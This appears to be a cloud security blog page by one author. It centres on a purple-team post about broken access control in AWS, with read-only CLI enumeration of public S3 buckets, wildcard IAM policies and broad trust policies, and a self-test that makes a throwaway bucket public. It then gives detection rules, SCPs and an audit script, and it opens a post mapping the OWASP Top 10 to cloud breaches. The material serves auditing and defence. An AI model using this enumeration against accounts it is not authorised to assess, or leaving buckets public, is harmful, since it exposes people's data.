--http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
The structural solution eliminates the credential entirely: OIDC workload identity on EKS/GKE means pods get scoped, short-lived tokens; the node’s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.


Broken Access Control in AWS: From Misconfigured S3 to Admin

June 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes


TL;DR

Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
A public S3 bucket containing 47 million customer records went undetected for six months until an authorized assessment found it: no GuardDuty finding, no AWS Config alert, because the controls were not configured to catch it
The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.

The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired. GuardDuty generates a Policy:S3/BucketAnonymousAccessGranted finding when it observes the change that makes a bucket public, so it only fires for changes made while GuardDuty is monitoring. The bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.

Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

# Check the account-level block once; it applies to every bucket in the account
account_id=$(aws sts get-caller-identity --query Account --output text)
account_block=$(aws s3control get-public-access-block \
  --account-id "$account_id" \
  2>/dev/null | jq -r '.PublicAccessBlockConfiguration.BlockPublicAcls')
echo "Account-level BlockPublicAcls: ${account_block:-not configured}"

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[] | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers") | .Permission')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with wildcard actions
# Statement may be an object or an array, and Action a string or an array
wildcard_filter='.Statement | if type == "array" then .[] else . end
  | select(.Effect == "Allow"
      and ((.Action // []) | if type == "array" then . else [.] end | any(. == "*")))'

aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read -r arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    if echo "$doc" | jq -e "$wildcard_filter" > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq "$wildcard_filter"
    fi
  done
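
IAM lets Statement be a single object or a list, and Action a single string or a list, so any wildcard check has to normalize both before comparing. The sketch below shows that normalization in Python on a hypothetical policy document; the function names as_list and wildcard_allow_statements are illustrative, and the check covers only the bare "*" action, not service-level wildcards such as "s3:*".

```python
from typing import Any, List


def as_list(value: Any) -> List[Any]:
    """Wrap a scalar in a list; pass lists through; map None to []."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def wildcard_allow_statements(policy_document: dict) -> List[dict]:
    """Return Allow statements whose Action includes the bare '*' wildcard."""
    return [
        statement
        for statement in as_list(policy_document.get("Statement"))
        if statement.get("Effect") == "Allow"
        and "*" in as_list(statement.get("Action"))
    ]


# Hypothetical policy document for illustration only
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ReadOnly", "Effect": "Allow",
         "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": "*"},
        {"Sid": "Everything", "Effect": "Allow",
         "Action": ["*"], "Resource": "*"},
        {"Sid": "Guardrail", "Effect": "Deny",
         "Action": "*", "Resource": "arn:aws:iam::*:role/admin"},
    ],
}

if __name__ == "__main__":
    for statement in wildcard_allow_statements(POLICY):
        print("WILDCARD ACTION:", statement["Sid"])
```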

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
current_account=$(aws sts get-caller-identity --query Account --output text)

aws iam list-roles --query 'Roles[].{Name:RoleName,Arn:Arn}' --output json | \
  jq -r '.[].Arn' | \
  while read -r role_arn; do
    trust=$(aws iam get-role --role-name "$(basename "$role_arn")" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals: "Principal": "*" or "Principal": {"AWS": "*"}
    if echo "$trust" | jq -e '.Statement[] | select(.Principal == "*" or .Principal.AWS? == "*")' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role_arn"
    fi

    # Check for cross-account trust (account root principals outside this account)
    echo "$trust" | \
      jq -r '.Statement[] | .Principal.AWS? // empty | if type == "array" then .[] else . end' 2>/dev/null | \
      grep -oE 'arn:aws:iam::[0-9]{12}:root' | grep -oE '[0-9]{12}' | sort -u | \
      while read -r account_in_trust; do
        if [ "$account_in_trust" != "$current_account" ]; then
          echo "CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust"
        fi
      done
  done
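
Trust policies express principals in several shapes: the bare string "*", an object with an AWS key holding one ARN, a list of ARNs, or a bare 12-digit account ID. A minimal Python sketch of a check that covers those shapes follows, assuming the trust policy has already been fetched and parsed. The function name trust_findings and the account IDs are hypothetical, and conditions on the statement are not evaluated.

```python
import re
from typing import Any, List, Tuple

ACCOUNT_IN_ARN = re.compile(r"^arn:aws[a-z-]*:(?:iam|sts)::(\d{12}):")


def as_list(value: Any) -> List[Any]:
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def trust_findings(trust_policy: dict, current_account: str) -> List[Tuple[str, str]]:
    """Return ('wildcard', '*') and ('cross-account', <account id>) findings."""
    findings = []
    for statement in as_list(trust_policy.get("Statement")):
        if statement.get("Effect") != "Allow":
            continue
        principal = statement.get("Principal")
        if principal == "*":
            findings.append(("wildcard", "*"))
            continue
        if not isinstance(principal, dict):
            continue
        for value in as_list(principal.get("AWS")):
            if value == "*":
                findings.append(("wildcard", "*"))
                continue
            match = ACCOUNT_IN_ARN.match(value)
            if match:
                account = match.group(1)
            elif re.fullmatch(r"\d{12}", value):
                account = value  # bare account ID form
            else:
                continue
            if account != current_account:
                findings.append(("cross-account", account))
    return findings


# Hypothetical trust policy for illustration only
TRUST = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"},
         "Action": "sts:AssumeRole"},
        {"Effect": "Allow", "Action": "sts:AssumeRole",
         "Principal": {"AWS": ["arn:aws:iam::111122223333:root",
                               "arn:aws:iam::123456789012:role/ci"]}},
        {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "sts:AssumeRole"},
    ],
}

if __name__ == "__main__":
    print(trust_findings(TRUST, current_account="123456789012"))
```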

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

Finding Type	Trigger	Severity
`Policy:S3/BucketAnonymousAccessGranted`	Bucket policy or ACL change grants access to anyone on the internet	High
`Policy:S3/BucketPublicAccessGranted`	Bucket policy or ACL change grants access to all authenticated AWS users	High
`Discovery:S3/MaliciousIPCaller`	S3 discovery API (for example, listing objects) called from a known malicious IP	High

# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

-- Athena query over CloudTrail logs to find anonymous S3 GetObject events
-- Assumes CloudTrail S3 data events are enabled for the bucket and that the table
-- uses the standard CloudTrail DDL, where requestParameters is a JSON string

SELECT
  eventTime,
  sourceIPAddress,
  json_extract_scalar(requestParameters, '$.bucketName') AS bucket_name,
  json_extract_scalar(requestParameters, '$.key') AS object_key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;
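
The same signal can be checked in a log-processing function, for example one that receives parsed CloudTrail records. This is a minimal Python sketch, assuming events shaped like the sample above; the function names is_anonymous_read and anonymous_reads_by_ip and the test events are hypothetical.

```python
from collections import Counter
from typing import Iterable


def is_anonymous_read(event: dict) -> bool:
    """True for an S3 GetObject made by the anonymous principal."""
    identity = event.get("userIdentity", {})
    return (
        event.get("eventSource") == "s3.amazonaws.com"
        and event.get("eventName") == "GetObject"
        and identity.get("type") == "AWSAccount"
        and identity.get("accountId") == "ANONYMOUS_PRINCIPAL"
    )


def anonymous_reads_by_ip(events: Iterable[dict]) -> Counter:
    """Count anonymous reads per source IP to surface bulk downloaders."""
    return Counter(
        event.get("sourceIPAddress", "unknown")
        for event in events
        if is_anonymous_read(event)
    )


# Hypothetical events for illustration only
ANONYMOUS = {"type": "AWSAccount", "accountId": "ANONYMOUS_PRINCIPAL"}
EVENTS = [
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "sourceIPAddress": "198.51.100.1", "userIdentity": ANONYMOUS},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "sourceIPAddress": "198.51.100.1", "userIdentity": ANONYMOUS},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "sourceIPAddress": "10.0.1.50",
     "userIdentity": {"type": "AssumedRole", "accountId": "123456789012"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject",
     "sourceIPAddress": "203.0.113.7", "userIdentity": ANONYMOUS},
]

if __name__ == "__main__":
    for ip, count in anonymous_reads_by_ip(EVENTS).most_common():
        print(f"{ip}: {count} anonymous GetObject calls")
```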

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)
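
The verify step only helps if all four settings are checked, because a configuration with any one of them false still leaves a path to public access. The sketch below is a small Python check over the JSON that get-public-access-block returns, assuming the standard PublicAccessBlockConfiguration wrapper. The function name missing_flags and the sample responses are hypothetical.

```python
from typing import List

REQUIRED_FLAGS = (
    "BlockPublicAcls",
    "IgnorePublicAcls",
    "BlockPublicPolicy",
    "RestrictPublicBuckets",
)


def missing_flags(response: dict) -> List[str]:
    """Return the public access block settings that are not set to true."""
    config = response.get("PublicAccessBlockConfiguration", {})
    return [flag for flag in REQUIRED_FLAGS if config.get(flag) is not True]


# Hypothetical responses for illustration only
FULLY_BLOCKED = {"PublicAccessBlockConfiguration": {
    "BlockPublicAcls": True, "IgnorePublicAcls": True,
    "BlockPublicPolicy": True, "RestrictPublicBuckets": True}}
PARTIAL = {"PublicAccessBlockConfiguration": {
    "BlockPublicAcls": True, "IgnorePublicAcls": True,
    "BlockPublicPolicy": False, "RestrictPublicBuckets": True}}

if __name__ == "__main__":
    for name, response in (("full", FULLY_BLOCKED), ("partial", PARTIAL)):
        gaps = missing_flags(response)
        print(name, "->", "compliant" if not gaps else f"missing: {gaps}")
```

An empty response, which is what a script sees when no account-level block has ever been configured and the error is swallowed, reports all four flags as missing.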

Fix 2: SCP to Prevent Disabling the Public Access Block

An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutAccountPublicAccessBlock",
        "s3:PutBucketPublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}

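# Create the SCP, then attach it to your organizational unit
aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level"

# Replace the placeholders with the policy ID returned above and your OU ID
aws organizations attach-policy \
  --policy-id "<returned-policy-id>" \
  --target-id "<your-ou-id>"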

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trailProperties": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or are authorized to audit with read-only access:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies (first 50 roles only)"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read -r role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' 2>/dev/null)
    # Match both "Principal": "*" and "Principal": {"AWS": "*"}
    if echo "$trust" | jq -e '.[] | select(.Principal == "*" or .Principal.AWS? == "*")' > /dev/null 2>&1; then
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
# --output text renders a missing value as the literal string "None"
if [ -z "$ANALYZER" ] || [ "$ANALYZER" = "None" ]; then
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.

Quick Reference

Control	What It Does	AWS Service
Account-level S3 public access block	Prevents any bucket from becoming public	S3 Control
SCP: deny public access block disable	Prevents disabling the account-level block	Organizations
AWS Config: `S3_BUCKET_PUBLIC_READ_PROHIBITED`	Flags buckets that are or become public	AWS Config
GuardDuty: `Policy:S3/BucketAnonymousAccessGranted`	Detects new public access grants	GuardDuty
IAM Access Analyzer	Finds all resources with external access grants	Access Analyzer
CloudTrail S3 data events	Captures GetObject/PutObject for audit	CloudTrail
IAM policy generation	Generates least-privilege policy from actual usage	Access Analyzer

Key Takeaways

Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.


OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

May 19, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → EP03: Cloud security breaches 2020–2025

TL;DR

OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.

Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.

A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

# Check the account-level public access block
aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets whose own public access block leaves BlockPublicAcls disabled
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

